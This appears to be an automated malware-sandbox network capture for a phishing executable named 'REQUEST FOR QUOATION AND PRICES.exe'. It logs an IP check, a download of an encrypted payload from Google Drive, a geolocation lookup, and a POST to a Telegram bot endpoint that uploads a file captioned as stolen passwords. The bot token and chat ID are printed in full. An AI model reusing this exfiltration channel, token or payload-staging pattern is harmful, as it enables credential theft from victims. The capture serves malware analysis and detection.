                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 3, 2024 15:24:06.803620100 CET321INHTTP/1.1 200 OK
                                                                                                                              Date: Tue, 03 Dec 2024 14:24:06 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 104
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              X-Request-ID: 866cab96c9299a3f5f61bcc69a9284a0
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              0192.168.2.749780172.217.19.1744437616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-03 14:22:41 UTC216OUTGET /uc?export=download&id=119KyFiZiJfJBOPS6lEGdsdCsk4yk9tad HTTP/1.1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                              Host: drive.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              2024-12-03 14:22:42 UTC1920INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Tue, 03 Dec 2024 14:22:42 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=119KyFiZiJfJBOPS6lEGdsdCsk4yk9tad&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'nonce-aICPj6RGo68NzKiE94gftA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              1192.168.2.749789142.250.181.974437616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-03 14:22:44 UTC258OUTGET /download?id=119KyFiZiJfJBOPS6lEGdsdCsk4yk9tad&export=download HTTP/1.1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-12-03 14:22:47 UTC4914INHTTP/1.1 200 OK
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Security-Policy: sandbox
                                                                                                                              Content-Security-Policy: default-src 'none'
                                                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                                                              X-Content-Security-Policy: sandbox
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Cross-Origin-Embedder-Policy: require-corp
                                                                                                                              Cross-Origin-Resource-Policy: same-site
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Content-Disposition: attachment; filename="ECBVVM208.bin"
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Allow-Credentials: false
                                                                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                              Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Content-Length: 94272
                                                                                                                              Last-Modified: Tue, 03 Dec 2024 06:46:46 GMT
                                                                                                                              X-GUploader-UploadID: AFiumC7u1Le8ZFkGzhTw2X4cJOiqhikdn8esOGKaAiMDFi3WsKQADja-K2XVKdWnO0Ijun1C_Zu_4mLpJA
                                                                                                                              Date: Tue, 03 Dec 2024 14:22:47 GMT
                                                                                                                              Expires: Tue, 03 Dec 2024 14:22:47 GMT
                                                                                                                              Cache-Control: private, max-age=0
                                                                                                                              X-Goog-Hash: crc32c=i+3h+A==
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close
                                                                                                                              2024-12-03 14:22:48 UTC4914INData Raw: bf 02 c9 fa 6b b3 d8 42 f8 43 e5 3b 71 c1 6e 88 25 d7 f3 a4 10 a8 83 e6 ef f5 92 61 83 fe 0b a9 fd 1f 60 5d f6 21 93 3f 0f 4e ad 3d 2f f4 bb 32 83 c5 32 c0 2f 65 91 bd 4e 15 d1 68 0e 18 29 4e 22 e1 1d ee 9e 18 98 17 d0 5c b9 e1 0d 95 de 53 dd 03 d7 f9 3d d0 c1 db d0 dd fa 1e e9 88 26 43 b6 95 85 79 79 c2 37 b2 9f 23 a1 4c c7 6e 40 46 bf b6 e5 79 82 97 d5 85 d4 9e c9 ee be 44 75 26 83 22 d4 db 6b 01 d3 f3 24 97 8a 69 02 3e 02 30 a9 a3 8f fa 2f 9b aa c0 f4 d7 07 bd d4 8e 6b 1e 67 b2 f0 73 72 4d d0 0a 26 95 5d 8d 9e ee 09 d8 ee ff b9 72 b2 25 12 36 1e 63 fe 98 a4 f5 63 55 e1 ca df a7 40 1a 4c dc f5 19 50 18 a2 bd b7 f1 0e 69 1e 2f 09 c4 aa cf b9 cf 50 81 84 8e 17 f5 62 d7 40 a5 a8 07 35 bd dc ee 66 78 86 14 95 4c d9 46 79 08 0f e8 24 a4 f0 c2 8f 11 f3 80 ec
                                                                                                                              Data Ascii: kBC;qn%a`]!?N=/22/eNh)N"\S=&Cyy7#Ln@FyDu&"k$i>0/kgsrM&]r%6ccU@LPi/Pb@5fxLFy$
                                                                                                                              2024-12-03 14:22:48 UTC4871INData Raw: ee 35 90 f0 da 52 9f 35 f9 5e 91 c8 5d c5 ef 72 e0 b5 9a 05 d0 0e 7f 17 3b 67 58 36 30 71 97 6e b3 c7 ff 0e 51 d6 29 5c 0d 0e 5c f3 28 5d 73 94 91 df 38 ae e8 00 c1 d7 bb b4 25 f7 c7 06 63 d6 71 86 c2 cc a7 4e c6 dd 6b 2f 9c 49 0d 47 6e 30 35 d1 62 65 75 6b 40 53 04 7a 3e 2a 08 2a d9 d6 0b 71 6b 81 b0 d5 49 da 68 27 d8 44 f8 96 8b c6 f0 8f fa 6d 26 19 cf 0a cd db 94 9d df e6 e9 59 a2 3a 39 04 af 90 bc 71 dc 06 b2 78 cf 1a 63 76 b1 bf 4e d3 07 4b df 40 ac f6 a3 81 ec f0 90 72 ca cd 88 99 56 29 cb d7 2d 0d 35 76 a8 6f 77 e3 c7 ee 70 de dc 8f f2 1d c4 6a c2 3f 0e 13 e3 c7 b3 02 6b 97 b3 dc 67 df 4c e9 e5 f0 4e 23 33 46 60 0d 03 72 bb 8d ea ef 8a 93 17 a4 74 fe e1 f2 60 b1 c0 65 03 dd f9 43 c2 c1 db 94 ae 6e 1e e9 82 35 44 a7 93 ea ec 79 c2 3d a3 98 4c 37 4c
                                                                                                                              Data Ascii: 5R5^]r;gX60qnQ)\\(]s8%cqNk/IGn05beuk@Sz>**qkIh'Dm&Y:9qxcvNK@rV)-5vowpj?kgLN#3F`rt`eCn5Dy=L7L
                                                                                                                              2024-12-03 14:22:48 UTC1321INData Raw: bc 23 2d 04 f0 10 d6 8e ee 6d 18 ad 9c a4 af 78 85 dd bb 5b cd 23 cc 12 65 97 9f 11 48 ac 7f c6 ae 2c 62 02 e4 38 cc f7 da a8 92 72 0c 83 a8 d6 e2 9c 3d 27 07 b0 5c 35 1f 0a 7e 58 11 1d 50 ac f6 6b 01 d8 f9 71 a6 c0 c3 07 54 55 d3 56 84 af 9f f9 2f 23 75 dc e9 6a ef e5 a3 13 30 f7 b7 59 2f 32 ef c2 eb 1b 4c c2 92 51 77 d8 ca 96 bd 39 00 8a 8d 84 98 64 8c 89 ad 4b 17 15 8a 0e e4 09 ab 7c 65 e3 8d 05 63 b9 d1 f0 23 b1 b9 2f 73 e5 57 66 ec e2 44 c3 ee 11 eb c6 ce 64 a3 b2 ab 59 a6 24 21 95 5a a5 c3 1d bc e0 2e 53 76 32 d4 36 e6 c3 27 b1 9b a9 d9 4b 04 13 96 09 f4 98 81 20 bc fd dc 01 54 35 f9 50 b5 1c 55 4b 8c 18 8f 3d b0 05 da 15 4f 1a 54 c4 59 36 3a 59 9e 66 b4 cf 73 19 03 5c 29 58 79 30 55 9c 5a 23 4a 9e 91 a5 02 27 e8 04 ef 57 b9 b3 2c e5 1b 22 e9 df 5d
                                                                                                                              Data Ascii: #-mx[#eH,b8r='\5~XPkqTUV/#uj0Y/2LQw9dK|ec#/sWfDdY$!Z.Sv26'K T5PUK=OTY6:Yfs\)Xy0UZ#J'W,"]
                                                                                                                              2024-12-03 14:22:48 UTC1390INData Raw: 9d 3a fb 95 a6 44 04 75 1c dd ca 83 67 81 6f 2a 4c d7 88 fe fe 2a 21 f3 67 2b 17 03 45 b9 0f 2a 2f 3b 26 7d 4c 25 d8 21 cf d4 27 24 4b 6f 13 b4 89 f8 72 08 db 70 fd d0 12 05 ce 88 7b 5f 87 ae 7b de de af 51 e6 7d 82 7a f7 7c df 96 b3 04 e8 e2 1f be 7e 33 5c c9 88 6e 53 16 49 4c 9e ab e1 89 4f 72 17 13 46 19 a8 b1 c2 0b 08 3e 49 b4 d7 64 52 6f 23 0f 54 28 07 89 a8 d6 51 10 28 b2 7e 51 a6 4b 1d 2e d7 8b 8a d2 c2 34 11 76 88 99 a6 3e cc 9a 8f aa ee d9 1d 7d ed a5 6c 2e b2 02 2e 1e db 7f 75 d6 0e 67 0c 0e d8 47 4b da 1f 9e 88 c7 fd 99 13 83 41 50 da 8c 8e a1 71 6d 46 5f ad d1 83 22 c9 0e 5e 73 1e 16 a5 8d 2d 88 82 50 b1 c3 21 a9 e7 a6 57 dc 80 d5 01 c4 5b de ce a2 06 4d d9 1c 3d 8c 08 ff 72 ed 43 95 f5 51 7a 41 c3 59 b8 65 d3 83 93 b3 cb 8f ad a4 56 3c b6 f6
                                                                                                                              Data Ascii: :Dugo*L*!g+E*/;&}L%!'$Korp{_{Q}z|~3\nSILOrF>IdRo#T(Q(~QK.4v>}l..ugGKAPqmF_"^s-P!W[M=rCQzAYeV<
                                                                                                                              2024-12-03 14:22:48 UTC1390INData Raw: 41 3e e2 ce 67 94 11 9f e0 1b ba 1d 59 3e c6 1d e7 bb 79 88 4d 8f 7a d8 9a 8d 28 f6 35 57 a7 e0 bb 29 e1 d2 cf eb 00 69 e6 a7 a5 e0 e3 2e 8e 7e b0 ef 19 a8 bb 65 7e db b6 7a 25 46 82 04 ab 07 9e 0f fe 35 ff 3d 7b ff 63 c8 b4 d8 a6 46 b2 c7 81 46 fe 6a da 00 f6 38 ac 41 70 cd ec 1b 1a 69 a2 f7 1d 20 40 85 d2 94 d3 49 dc 2e fc 39 60 6f ca 43 1f c8 c4 c9 bc bb 2b 77 01 3d 23 ca 52 a8 87 13 53 79 35 2e fd b0 39 a7 92 7a 5a 8e c0 b3 75 04 fe 35 5e 4e e9 fc a6 52 b2 81 6e 93 75 36 ab ce 94 54 4d a5 cc 87 23 e8 e5 0b 4e 17 d7 9c 16 cc 12 ca 5c f4 47 6e 91 0a 0f 6f d7 01 fb 25 82 b1 7c 66 c8 a0 7d 75 38 73 85 77 06 06 2c 63 7f 72 ab bd 4b d5 2a 22 9e f6 d9 63 21 88 0b c9 41 b4 9d 6c 88 f9 ec 71 a1 98 ec 2c fb 2d e1 38 d3 c3 8f 6b c4 eb 1a 17 fd 2a 35 e4 32 c7 04
                                                                                                                              Data Ascii: A>gY>yMz(5W)i.~e~z%F5={cFFj8Api @I.9`oC+w=#RSy5.9zZu5^NRnu6TM#N\Gno%|f}u8sw,crK*"c!Alq,-8k*52
                                                                                                                              2024-12-03 14:22:48 UTC1390INData Raw: d2 74 a1 c8 46 8c c5 60 e5 9a 73 e0 31 15 09 61 16 05 36 1d 92 de 99 d9 7c 61 6a ac b3 54 21 1b 23 cb de d2 d8 5b b3 f5 91 a2 ee 8a a6 be 6c f2 fc 11 a5 ad 61 2f 87 ae 37 d5 42 41 6b 33 81 3f d1 ce c1 66 04 95 04 14 8a 51 86 03 b1 0c ad aa a9 cc 3f 8b 8f 13 59 cf 27 ad 7d 87 a5 a6 41 19 be 24 ac e7 74 b2 e3 44 28 99 63 4b 33 ac 83 1b 53 f6 78 0f 7b 4e 3c af e3 f0 3f 42 40 5d 37 2b 41 5f e6 93 e7 0f 61 c9 e4 ba 66 63 4d 2d 19 23 ed 76 73 14 52 05 eb 27 84 2f bd 68 eb 07 8b 82 c1 0a 52 b0 b0 aa e8 68 f2 e3 0f ac 5f 04 1c d2 89 e0 18 18 d2 8b 28 39 c0 12 0f 24 c1 6a 13 69 39 d1 a8 b0 f3 c1 92 72 ee 86 24 37 9d f5 e5 f8 e0 a7 aa 23 5b d7 40 e3 68 76 da f2 a9 2a ee db e1 ca 2b 50 ce ea a3 2c 3a ee bd 3f 76 fd e2 03 35 16 ed 4a 9c 62 52 fd a3 be da cc 23 f3 95
                                                                                                                              Data Ascii: tF`s1a6|ajT!#[la/7BAk3?fQ?Y'}A$tD(cK3Sx{N<?B@]7+A_afcM-#vsR'/hRh_(9$ji9r$7#[@hv*+P,:?v5JbR#
                                                                                                                              2024-12-03 14:22:48 UTC1390INData Raw: fa 06 5e b6 e5 ad 37 79 c2 3d b8 9f 25 89 b4 c7 6e 4a 4d b8 8f a3 78 82 97 d3 f6 03 9e c9 e8 32 4c 07 7c 91 3d 1e ba b9 b5 da 38 23 27 e4 f6 cf 1f 50 4f 1a c3 a9 9c 4e f3 f5 a5 94 ba 27 d6 a4 e7 77 19 0f 92 e2 79 87 3f a5 62 0b f4 22 aa a8 df 46 f8 f3 ff 08 17 9c 2e 0c 38 32 72 f9 ea 38 e9 63 25 de 5a df a7 0a 08 4a cd 47 0b b6 a9 a2 bb a4 f9 1f 61 32 6c ef ec ab cf b2 c4 6f 85 85 e8 1c 9a 67 de 40 af 80 93 35 bd 04 78 6e 69 8f 20 6b 4d ca ec 69 02 19 16 65 b7 fb f3 84 3d e5 aa 46 ec 6c 68 ec 44 9f a4 1e f5 ea da a5 13 dd 22 87 f5 cd 39 b5 25 bb 86 2f 88 4a a3 dc 35 f1 70 9b 72 1a 30 fd 56 38 32 b9 20 32 6e 3f 41 d3 11 d4 d3 6c 93 88 19 c5 8e 64 ac 85 3d 27 8d 4e 13 33 2e d4 6c bf 59 f9 9b b0 41 98 57 d9 13 e3 14 00 d0 76 92 60 86 6e 89 6c 76 f0 de 3f e4
                                                                                                                              Data Ascii: ^7y=%nJMx2L|=8#'PON'wy?b"F.82r8c%ZJGa2log@5xni kMie=FlhD"9%/J5pr0V82 2n?Ald='N3.lYAWv`nlv?
                                                                                                                              2024-12-03 14:22:48 UTC1390INData Raw: 11 2e b8 d1 fe 75 76 b9 2f 7f de 0a 77 e5 fc b6 ca ee 1d eb ca f4 97 a0 da e8 48 ad 0c 1f 6e f0 a5 c9 17 ad e5 43 77 3a 32 de 23 91 b8 b2 b1 91 87 9e 4e 04 19 9b 2b c7 9f b8 8d 90 f0 d4 72 09 32 8b c8 81 cf 25 24 53 18 8f 3b f5 5a da 0e 75 38 e8 ee 58 30 29 79 9e 77 a1 bd 93 62 3e 2c 3f 74 86 0e 55 96 48 a3 70 8f 94 d3 c8 ab e8 74 ff 74 3a b4 2f fd 0f f4 60 80 4e 8d da af 8a 03 db 5a 54 f3 42 5b 0d 79 2f d6 21 db 01 c3 50 54 1b f1 21 68 91 11 1f 2a a9 74 2e 68 04 9d 12 f0 57 da 78 39 d8 44 4c 9b 11 d7 f5 27 c9 8f 55 24 ea 1b b8 40 a7 3c df e6 e3 39 23 44 36 0e bc 92 bc 7a 8a 56 b2 78 c1 e9 e1 76 b1 b1 21 5d 16 4c c2 96 ae f7 dd 09 fd f6 a4 ec 15 32 77 9d 39 67 db f2 0f 3e 24 70 8a ed 79 e3 e5 ce 00 d5 d6 21 da 2b ee 2b d8 50 33 13 e3 cd 9b 56 6b 97 b9 e4
                                                                                                                              Data Ascii: .uv/wHnCw:2#N+r2%$S;Zu8X0)ywb>,?tUHptt:/`NZTB[y/!PT!h*t.hWx9DL'U$@<9#D6zVxv!]L2w9g>$py!++P3Vk
                                                                                                                              2024-12-03 14:22:48 UTC1390INData Raw: c0 3a a7 98 48 cf 1c 04 bf 9f 32 a7 cb f0 07 4b 0c 52 7c e1 18 51 78 b2 c2 4d 2e 27 94 f4 f1 e1 c0 80 fc 3c 54 c9 8b 09 47 d9 95 85 19 f8 80 d6 57 d5 3e c6 54 cb 2f 35 a0 8c 12 6c 63 ea 25 75 c6 30 c7 0d e3 17 e9 f7 1b ea cf 59 2a d7 b2 42 2b 61 91 43 bb de ce 88 35 24 93 b9 9b c2 f0 6f da 92 de a5 43 dd 9d 36 bc c7 9c 01 12 d4 e2 67 04 ea 51 b7 05 43 b1 1a 1f 46 7f 8d 45 4f 7b 8e 71 b6 f8 75 c7 e2 8c 5d 06 fe d9 ff 02 eb 33 ed 7f 0b e3 d2 6e d0 2d 35 bb 10 76 14 8e 35 90 0c 1d 9f c4 e5 b5 5b 0e 04 84 10 4a 8e ee 6d 12 af 9f 02 3e 05 c8 d7 b0 58 f6 67 b6 5f 65 91 e8 ee 99 ac 79 c0 db 12 38 1e e0 48 a3 0f da a8 94 47 34 ee 7b 4c e2 9a 2a d9 14 b6 5b 26 1a 49 2f 59 11 19 26 ee f1 19 63 ec ad 01 c9 1f c9 01 41 5c ca 43 af d0 e3 9e 69 53 1a 0d c1 b9 e9 f6 ad
                                                                                                                              Data Ascii: :H2KR|QxM.'<TGW>T/5lc%u0Y*B+aC5$oC6gQCFEO{qu]3n-5v5[Jm>Xg_ey8HG4{L*[&I/Y&cA\CiS
                                                                                                                              2024-12-03 14:22:48 UTC1390INData Raw: 9a 66 72 15 33 4b aa 72 ab b7 27 9b 2a 23 8f d5 cb 11 bf 8c 0b b9 61 94 8c 6b fa 64 ea 59 09 f7 1f 26 89 be e9 36 b2 fd b3 f9 de e1 60 78 08 02 cd ee 19 cc 18 df 93 79 6a 0a bc 16 89 bd 3e 7f ac 39 45 c6 64 4f 1f 8c 50 96 f2 8e 99 5e b8 b5 49 2e 2a ea 72 d0 80 c7 87 d7 51 25 51 c2 25 b8 28 98 d4 c1 2c 68 d7 49 a9 16 ec a1 87 62 24 ff f5 e6 f2 82 3f 51 ec 10 03 b7 05 56 b7 14 3f 56 46 ba 61 48 44 b3 dc 81 d4 21 3d ce 71 16 9c 1e f8 60 0c e0 a5 ec d8 34 55 cd b1 7d 73 16 7a 1b c8 dd 51 4d 85 78 83 61 92 55 4b 96 b9 02 27 eb 25 b5 6a cd 77 db 92 7f 59 02 b7 50 8d da 67 82 6c 64 3f b9 46 02 92 aa c7 2e 54 3e 49 92 c6 6d 6b fa 50 d6 52 3b 08 82 b2 5b 45 30 28 9b f1 47 d4 8b 00 3f a0 5b 33 d9 b0 a2 6b a3 f8 3b 85 49 e1 98 99 a0 b6 c7 38 64 99 a8 7f 2e d3 a4 50
                                                                                                                              Data Ascii: fr3Kr'*#akdY&6`xyj>9EdOP^I.*rQ%Q%(,hIb$?QV?VFaHD!=q`4U}szQMxaUK'%jwYPgld?F.T>ImkPR;[E0(G?[3k;I8d.P


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              2192.168.2.749809104.21.67.1524437616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-03 14:22:52 UTC85OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-12-03 14:22:53 UTC878INHTTP/1.1 200 OK
                                                                                                                              Date: Tue, 03 Dec 2024 14:22:53 GMT
                                                                                                                              Content-Type: text/xml
                                                                                                                              Content-Length: 362
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                              CF-Cache-Status: HIT
                                                                                                                              Age: 113196
                                                                                                                              Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yh%2BWO1PGGzVJnbD82lT57sscU0MfSphiDltIKLXnnZpnIa36EnY2gz1zJnkOyQYK5a%2FwkmGxNZS1lIIPovgXERuum4t2UEhOz%2Bz4jDhh%2B0dKUFD6nN8qCxwn4amxecuhEJpFvFjH"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8ec4361d4f2a4205-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1742&min_rtt=1738&rtt_var=661&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1645070&cwnd=252&unsent_bytes=0&cid=94007ec09079cfd3&ts=483&x=0"
                                                                                                                              2024-12-03 14:22:53 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                              Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              3192.168.2.749830149.154.167.2204437616C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-03 14:23:01 UTC299OUTPOST /bot7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1
                                                                                                                              Content-Type: multipart/form-data; boundary================8dd13868a3c5d2e
                                                                                                                              Host: api.telegram.org
                                                                                                                              Content-Length: 1090
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-12-03 14:23:01 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 33 38 36 38 61 33 63 35 64 32 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: --===============8dd13868a3c5d2eContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                              2024-12-03 14:23:01 UTC388INHTTP/1.1 200 OK
                                                                                                                              Server: nginx/1.18.0
                                                                                                                              Date: Tue, 03 Dec 2024 14:23:01 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 544
                                                                                                                              Connection: close
                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
